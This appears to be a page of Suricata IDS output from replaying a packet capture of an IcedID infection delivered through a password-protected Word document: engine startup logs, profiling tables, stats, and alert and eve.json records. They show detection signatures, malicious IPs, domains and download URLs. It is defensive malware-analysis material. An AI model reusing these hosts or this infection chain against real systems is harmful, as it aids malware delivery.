24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for other-ip
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_uri
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_request_line
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_client_body
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_response_line
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_header
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_header
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_header_names
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_header_names
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_accept
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_accept_enc
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_accept_lang
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_referer
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_connection
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_content_len
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_content_len
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_content_type
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_content_type
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_protocol
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_protocol
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_start
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_start
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_raw_header
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_raw_header
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_method
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_cookie
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_cookie
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_raw_uri
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_user_agent
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_host
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_raw_host
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_stat_msg
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_stat_code
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for dns_query
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for tls_sni
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for tls_cert_issuer
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for tls_cert_subject
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for tls_cert_serial
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for dce_stub_data
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for dce_stub_data
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for ssh_protocol
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for ssh_protocol
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for ssh_software
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for ssh_software
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for file_data
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for file_data
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_request_line
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_response_line
24/1/2019 -- 11:52:44 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
24/1/2019 -- 11:52:44 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
24/1/2019 -- 11:52:44 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
24/1/2019 -- 11:52:44 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
24/1/2019 -- 11:52:44 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
24/1/2019 -- 11:52:44 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
24/1/2019 -- 11:52:44 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
24/1/2019 -- 11:52:44 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
24/1/2019 -- 11:52:49 - <Perf> - Unique rule groups: 104
24/1/2019 -- 11:52:49 - <Perf> - Builtin MPM "toserver TCP packet": 35
24/1/2019 -- 11:52:49 - <Perf> - Builtin MPM "toclient TCP packet": 17
24/1/2019 -- 11:52:49 - <Perf> - Builtin MPM "toserver TCP stream": 33
24/1/2019 -- 11:52:49 - <Perf> - Builtin MPM "toclient TCP stream": 19
24/1/2019 -- 11:52:49 - <Perf> - Builtin MPM "toserver UDP packet": 27
24/1/2019 -- 11:52:49 - <Perf> - Builtin MPM "toclient UDP packet": 17
24/1/2019 -- 11:52:49 - <Perf> - Builtin MPM "other IP packet": 3
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_uri": 14
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_request_line": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_client_body": 6
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toclient http_response_line": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_header": 10
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toclient http_header": 6
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_header_names": 2
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_accept": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_referer": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_content_len": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_content_type": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toclient http_content_type": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_protocol": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_start": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_method": 5
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_cookie": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toclient http_cookie": 2
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_host": 2
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver dns_query": 4
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver tls_sni": 2
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver file_data": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toclient file_data": 7
24/1/2019 -- 11:52:50 - <Perf> - Registered 39590 rule profiling counters.
24/1/2019 -- 11:52:50 - <Info> - fast output device (regular) initialized: alert
24/1/2019 -- 11:52:50 - <Info> - eve-log output device (regular) initialized: eve.json
24/1/2019 -- 11:52:50 - <Config> - enabling 'eve-log' module 'alert'
24/1/2019 -- 11:52:50 - <Config> - enabling 'eve-log' module 'http'
24/1/2019 -- 11:52:50 - <Config> - enabling 'eve-log' module 'dns'
24/1/2019 -- 11:52:50 - <Config> - enabling 'eve-log' module 'tls'
24/1/2019 -- 11:52:50 - <Config> - enabling 'eve-log' module 'files'
24/1/2019 -- 11:52:50 - <Config> - enabling 'eve-log' module 'ssh'
24/1/2019 -- 11:52:50 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
24/1/2019 -- 11:52:50 - <Info> - stats output device (regular) initialized: stats.log
24/1/2019 -- 11:52:50 - <Config> - AutoFP mode using "Hash" flow load balancer
24/1/2019 -- 11:52:50 - <Info> - reading pcap file /var/pcap/01242019.1152-2018-12-17-IcedID-from-password-protected-Word-doc.pcap
24/1/2019

This file has been truncated. Go here to download in full.


packet_stats.log - (13411 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       6          1478           107866      248172082     192837143        285.0b   98.46
 IPv4      17            23         13133175      244927281     193309659          4.4b    1.54
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       6          1478            66597       17082538        198595        293.5m   90.94
TMM_FLOWWORKER              IPv4      17            23           276893        6768463        696617         16.0m    4.96
TMM_RECEIVEPCAPFILE         IPv4       6          1462             2538          96570          3039          4.4m    1.38
TMM_RECEIVEPCAPFILE         IPv4      17            23             2542           4666          2740         63.0k    0.02
TMM_DECODEPCAPFILE          IPv4       6          1462             2645        4428788          5898          8.6m    2.67
TMM_DECODEPCAPFILE          IPv4      17            23             2664          11029          3531         81.2k    0.03

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       6          1462             2730          37048          3295          4.8m  1.80  
flow                    IPv4      17            23             2866          17054          4753        109.3k  0.04  
stream                  IPv4       6          1478             2650         237489          7960         11.8m  4.40  
app-layer               IPv4      17            23             8753          40811         17420        400.7k  0.15  
detect                  IPv4       6          1478            44694       17053684        161169        238.2m  89.10 
detect                  IPv4      17            23           225471         561076        328990          7.6m  2.83  
tcp-prune               IPv4       6          1478             2544          58058          3022          4.5m  1.67  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6             5             3788          40963         21904        109.5k  34.72 
tls                     IPv4       6            28             2685           5933          3195         89.5k  28.36 
dns                     IPv4      17            23             3130           9168          5065        116.5k  36.93 
Proto detect            IPv4      17            23             3533          21856          7895        181.6k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6             3            85182       10268303       3482782         10.4m  52.26 
LOGGER_ALERT_FAST           IPv4      17             5            35862          83450         46610        233.1k  1.17  
LOGGER_UNIFIED2             IPv4       6             3            71908         176191        118625        355.9k  1.78  
LOGGER_UNIFIED2             IPv4      17             5            23654          43787         28413        142.1k  0.71  
LOGGER_JSON_ALERT           IPv4       6             3           100101         144960        116583        349.8k  1.75  
LOGGER_JSON_ALERT           IPv4      17             5            48637          64318         53292        266.5k  1.33  
LOGGER_JSON_DNS             IPv4      17            19            28477        6121080        363928          6.9m  34.58 
LOGGER_JSON_HTTP            IPv4       6             4            88610         141643        115109        460.4k  2.30  
LOGGER_JSON_TLS             IPv4       6            14            32323          75593         43956        615.4k  3.08  
LOGGER_JSON_FILE            IPv4       6             3            49574          87214         69571        208.7k  1.04  

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       6           374             2597         134596         18361         6.9m  14.79 
payload                           IPv4      17            23             3884          37355         16257       373.9k  0.81  
stream                            IPv4       6           374             2536         380127         24578         9.2m  19.80 
http_uri                          IPv4       6             4             9138          16439         12427        49.7k  0.11  
http_request_line                 IPv4       6             4             7039           9764          8270        33.1k  0.07  
http_client_body                  IPv4       6             4             2888           3822          3431        13.7k  0.03  
http_header (request)             IPv4       6             4            41792          81853         63325       253.3k  0.55  
http_header (request trailer)     IPv4       6             4             2619           2676          2655        10.6k  0.02  
http_header_names (request)       IPv4       6             4            11099          22484         17949        71.8k  0.15  
http_accept (request)             IPv4       6             4             3547           7517          4956        19.8k  0.04  
http_referer (request)            IPv4       6             4             3189           3380          3280        13.1k  0.03  
http_content_len (request)        IPv4       6             4             3208           3991          3477        13.9k  0.03  
http_content_type (request)       IPv4       6             4             3027           3551          3249        13.0k  0.03  
http_protocol (request)           IPv4       6             4             3840           6292          5074        20.3k  0.04  
http_start (request)              IPv4       6             4            11950          16406         13985        55.9k  0.12  
http_raw_header (request)         IPv4       6             4             9360          17131         13804        55.2k  0.12  
http_method                       IPv4       6             4             5045           6920          6179        24.7k  0.05  
http_cookie (request)             IPv4       6             4             3190           3595          3370        13.5k  0.03  
http_raw_uri                      IPv4       6             4             4802           6848          5456        21.8k  0.05  
http_user_agent                   IPv4       6             4             2960          39705         20045        80.2k  0.17  
http_host                         IPv4       6             4             4015           7428          5490        22.0k  0.05  
dns_query                         IPv4      17            10             4684           9777          6787        67.9k  0.15  
tls_sni                           IPv4       6            14             3058          27057          6064        84.9k  0.18  
http_response_line                IPv4       6             4             6702           9790          7754        31.0k  0.07  
http_header (response)            IPv4       6           108             2630          53306          4437       479.3k  1.03  
http_header (response trailer)    IPv4       6             4             2640           3365          2881        11.5k  0.02  
http_content_type (response)      IPv4       6           108             2744          12311          3176       343.0k  0.74  
http_raw_header (response)        IPv4       6           158             4113          10499          4687       740.6k  1.59  
http_cookie (response)            IPv4       6           108             2724           4146          2891       312.3k  0.67  
http_stat_code                    IPv4       6           108             2617          17957          2956       319.3k  0.69  
tls_cert_issuer                   IPv4       6            14             3365          23113          5743        80.4k  0.17  
tls_cert_subject                  IPv4       6            14             3549          10827          5707        79.9k  0.17  
tls_cert_serial                   IPv4       6            14             3048          20891          6287        88.0k  0.19  
file_data (http response)         IPv4       6           154             2569       14472347        172590        26.6m  57.24 
Total                             IPv4                  1661                                         27956        46.4m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       6            36             3326          85675         27375        985.5k  0.32  
PROF_DETECT_IPONLY          IPv4      17            19            36602          67947         43780        831.8k  0.27  
PROF_DETECT_RULES           IPv4       6          1478             2518       16989808         56959         84.2m  27.55 
PROF_DETECT_RULES           IPv4      17            23            92557         309358        186221          4.3m  1.40  
PROF_DETECT_STATEFUL_START    IPv4       6           204             5100       16956310        179822         36.7m  12.00 
PROF_DETECT_STATEFUL_START    IPv4      17             5            15991          17649         16486         82.4k  0.03  
PROF_DETECT_STATEFUL_CONT    IPv4       6          1478             2523        8440852         13250         19.6m  6.41  
PROF_DETECT_STATEFUL_CONT    IPv4      17            23             5601          53713          8099        186.3k  0.06  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6          1406             2544          26290          2722          3.8m  1.25  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17            23             2579           3183          2768         63.7k  0.02  
PROF_DETECT_PREFILTER       IPv4       6          1478             7742       14741434         50595         74.8m  24.47 
PROF_DETECT_PREFILTER       IPv4      17            23            30246          80381         49276          1.1m  0.37  
PROF_DETECT_PF_PAYLOAD      IPv4       6           374            12905         445682         50939         19.1m  6.23  
PROF_DETECT_PF_PAYLOAD      IPv4      17            23             8986          42650         21531        495.2k  0.16  
PROF_DETECT_PF_TX           IPv4       6          1406             2554       14486756         25999         36.6m  11.96 
PROF_DETECT_PF_TX           IPv4      17            14             2568          16216          9712        136.0k  0.04  
PROF_DETECT_PF_SORT1        IPv4       6           234             2542          21977          3556        832.2k  0.27  
PROF_DETECT_PF_SORT1        IPv4      17            23             2870          20082          4482        103.1k  0.03  
PROF_DETECT_PF_SORT2        IPv4       6          1478             2516          29811          2771          4.1m  1.34  
PROF_DETECT_PF_SORT2        IPv4      17            23             2707           5091          3332         76.6k  0.03  
PROF_DETECT_NONMPMLIST      IPv4       6          1478             2522          32084          2957          4.4m  1.43  
PROF_DETECT_NONMPMLIST      IPv4      17            23             2579           3433          2971         68.3k  0.02  
PROF_DETECT_ALERT           IPv4       6          1478             2514          37300          2745          4.1m  1.33  
PROF_DETECT_ALERT           IPv4      17            23             2533          10344          3201         73.6k  0.02  
PROF_DETECT_CLEANUP         IPv4       6          1478             2560          46003          2905          4.3m  1.40  
PROF_DETECT_CLEANUP         IPv4      17            23             2527          16209          4060         93.4k  0.03  
PROF_DETECT_GETSGH          IPv4       6          1478             2512          27004          3086          4.6m  1.49  
PROF_DETECT_GETSGH          IPv4      17            23             2714           6547          5377        123.7k  0.04  


suricata-4.0.0-etpro-all-alert-2019-01-24-T-11-52-53-01242019.1152-2018-12-17-IcedID-from-password-protected-Word-doc.pcap.txt - (2734 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
12/17/2018-15:20:23.641568  [**] [1:2022482:3] ET TROJAN JS/Nemucod requesting EXE payload 2016-02-01 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.12.17.101:49172 -> 209.141.61.249:80
12/17/2018-15:20:23.641568  [**] [1:2016141:5] ET INFO Executable Download from dotted-quad Host [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.12.17.101:49172 -> 209.141.61.249:80
12/17/2018-15:20:23.641568  [**] [1:2022550:16] ET CURRENT_EVENTS Possible Malicious Macro DL EXE Feb 2016 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.12.17.101:49172 -> 209.141.61.249:80
12/17/2018-15:20:23.643019  [**] [1:2022050:3] ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 209.141.61.249:80 -> 10.12.17.101:49172
12/17/2018-15:20:24.174859  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 209.141.61.249:80 -> 10.12.17.101:49172
12/17/2018-15:20:24.174859  [**] [1:2021954:2] ET TROJAN JS/Nemucod.M.gen downloading EXE payload [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 209.141.61.249:80 -> 10.12.17.101:49172
12/17/2018-15:20:24.174859  [**] [1:2022051:2] ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 209.141.61.249:80 -> 10.12.17.101:49172
12/17/2018-15:20:24.174859  [**] [1:2021076:2] ET INFO SUSPICIOUS Dotted Quad Host MZ Response [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 209.141.61.249:80 -> 10.12.17.101:49172
12/17/2018-15:30:52.592978  [**] [1:2016778:5] ET DNS Query to a *.pw domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.12.17.101:57671 -> 10.12.17.1:53
12/17/2018-15:35:58.089083  [**] [1:2016778:5] ET DNS Query to a *.pw domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.12.17.101:56493 -> 10.12.17.1:53
12/17/2018-15:40:59.825334  [**] [1:2016778:5] ET DNS Query to a *.pw domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.12.17.101:56054 -> 10.12.17.1:53
12/17/2018-15:46:01.192784  [**] [1:2016778:5] ET DNS Query to a *.pw domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.12.17.101:58915 -> 10.12.17.1:53
12/17/2018-15:51:03.001823  [**] [1:2016778:5] ET DNS Query to a *.pw domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.12.17.101:65495 -> 10.12.17.1:53


stats.log - (3379 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
------------------------------------------------------------------------------------
Date: 1/24/2019 -- 11:52:53 (uptime: 0d, 00h 00m 03s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 1485
decoder.bytes                              | Total                     | 1062600
decoder.ipv4                               | Total                     | 1485
decoder.ethernet                           | Total                     | 1485
decoder.tcp                                | Total                     | 1462
decoder.udp                                | Total                     | 23
decoder.avg_pkt_size                       | Total                     | 715
decoder.max_pkt_size                       | Total                     | 1514
flow.tcp                                   | Total                     | 18
flow.udp                                   | Total                     | 10
tcp.sessions                               | Total                     | 18
tcp.syn                                    | Total                     | 18
tcp.synack                                 | Total                     | 18
tcp.rst                                    | Total                     | 14
tcp.overlap                                | Total                     | 26
detect.alert                               | Total                     | 13
detect.mpm_list                            | Total                     | 1
detect.nonmpm_list                         | Total                     | 2
detect.match_list                          | Total                     | 2
app_layer.flow.http                        | Total                     | 4
app_layer.tx.http                          | Total                     | 4
app_layer.flow.tls                         | Total                     | 14
app_layer.flow.dns_udp                     | Total                     | 10
app_layer.tx.dns_udp                       | Total                     | 10
flow_mgr.closed_pruned                     | Total                     | 3
flow_mgr.new_pruned                        | Total                     | 1
flow_mgr.est_pruned                        | Total                     | 8
flow.spare                                 | Total                     | 10000
flow_mgr.flows_checked                     | Total                     | 28
flow_mgr.flows_notimeout                   | Total                     | 3
flow_mgr.flows_timeout                     | Total                     | 25
flow_mgr.flows_timeout_inuse               | Total                     | 13
flow_mgr.flows_removed                     | Total                     | 12
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65508
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7082368


eve.json - (20042 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
{"timestamp":"2018-12-17T15:19:41.499045+0000","flow_id":1454674260368741,"pcap_cnt":1,"event_type":"dns","src_ip":"10.12.17.101","src_port":60979,"dest_ip":"10.12.17.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":13164,"rrname":"13207303642.aircq.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-17T15:19:41.578500+0000","flow_id":1454674260368741,"pcap_cnt":2,"event_type":"dns","src_ip":"10.12.17.1","src_port":53,"dest_ip":"10.12.17.101","dest_port":60979,"proto":"UDP","dns":{"type":"answer","id":13164,"rcode":"NOERROR","rrname":"13207303642.aircq.com","rrtype":"A","ttl":5,"rdata":"209.141.42.165"}}
{"timestamp":"2018-12-17T15:19:42.157279+0000","flow_id":1808528025966446,"pcap_cnt":9,"event_type":"http","src_ip":"10.12.17.101","src_port":49162,"dest_ip":"209.141.42.165","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"13207303642.aircq.com","url":"\/88924438472","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2018-12-17T15:19:42.772794+0000","flow_id":1026466021016667,"pcap_cnt":63,"event_type":"http","src_ip":"10.12.17.101","src_port":49165,"dest_ip":"139.59.147.170","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"139.59.147.170","url":"\/important.doc","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"application\/msword"}}
{"timestamp":"2018-12-17T15:19:47.161912+0000","flow_id":1808528025966446,"pcap_cnt":64,"event_type":"fileinfo","src_ip":"209.141.42.165","src_port":80,"dest_ip":"10.12.17.101","dest_port":49162,"proto":"TCP","http":{"hostname":"13207303642.aircq.com","url":"\/88924438472","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":301,"redirect":"http:\/\/139.59.147.170\/important.doc","length":243},"app_proto":"http","fileinfo":{"filename":"\/88924438472","gaps":false,"state":"CLOSED","stored":false,"size":243,"tx_id":0}}
{"timestamp":"2018-12-17T15:19:49.871749+0000","flow_id":1026466021016667,"pcap_cnt":68,"event_type":"fileinfo","src_ip":"139.59.147.170","src_port":80,"dest_ip":"10.12.17.101","dest_port":49165,"proto":"TCP","http":{"hostname":"139.59.147.170","url":"\/important.doc","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"application\/msword","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":40960},"app_proto":"http","fileinfo":{"filename":"\/important.doc","gaps":false,"state":"CLOSED","stored":false,"size":40960,"tx_id":0}}
{"timestamp":"2018-12-17T15:20:23.641568+0000","flow_id":2191686356098050,"pcap_cnt":77,"event_type":"alert","src_ip":"10.12.17.101","src_port":49172,"dest_ip":"209.141.61.249","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2022482,"rev":3,"signature":"ET TROJAN JS\/Nemucod requesting EXE payload 2016-02-01","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-12-17T15:20:23.641568+0000","flow_id":2191686356098050,"pcap_cnt":77,"event_type":"alert","src_ip":"10.12.17.101","src_port":49172,"dest_ip":"209.141.61.249","dest_port":80,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2016141,"rev":5,"signature":"ET INFO Executable Download from dotted-quad Host","category":"A Network Trojan was detected","severity":1}}
{"timestamp":"2018-12-17T15:20:23.641568+0000","flow_id":2191686356098050,"pcap_cnt":77,"event_type":"alert","src_ip":"10.12.17.101","src_port":49172,"dest_ip":"209.141.61.249","dest_port":80,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2022550,"rev":16,"signature":"ET CURRENT_EVENTS Possible Malicious Macro DL EXE Feb 2016","category":"A Network Trojan was detected","severity":1}}
{"timestamp":"2018-12-17T15:20:23.643019+0000","flow_id":2191686356098050,"pcap_cnt":86,"event_type":"alert","src_ip":"209.141.61.249","src_port":80,"dest_ip":"10.12.17.101","dest_port":49172,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2022050,"rev":3,"signature":"ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-12-17T15:20:24.174859+0000","flow_id":2191686356098050,"pcap_cnt":114,"event_type":"alert","src_ip":"209.141.61.249","src_port":80,"dest_ip":"10.12.17.101","dest_port":49172,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2018959,"rev":3,"signature":"ET POLICY PE EXE or DLL Windows file download HTTP","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"2018-12-17T15:20:24.174859+0000","flow_id":2191686356098050,"pcap_cnt":114,"event_type":"alert","src_ip":"209.141.61.249","src_port":80,"dest_ip":"10.12.17.101","dest_port":49172,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2021954,"rev":2,"signature":"ET TROJAN JS\/Nemucod.M.gen downloading EXE payload","category":"A Network Trojan was detected","severity":1}}
{"timestamp":"2018-12-17T15:20:24.174859+0000","flow_id":2191686356098050,"pcap_cnt":114,"event_type":"alert","src_ip":"209.141.61.249","src_port":80,"dest_ip":"10.12.17.101","dest_port":49172,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2022051,"rev":2,"signature":"ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2","category":"A Network Trojan was detected","severity":1}}
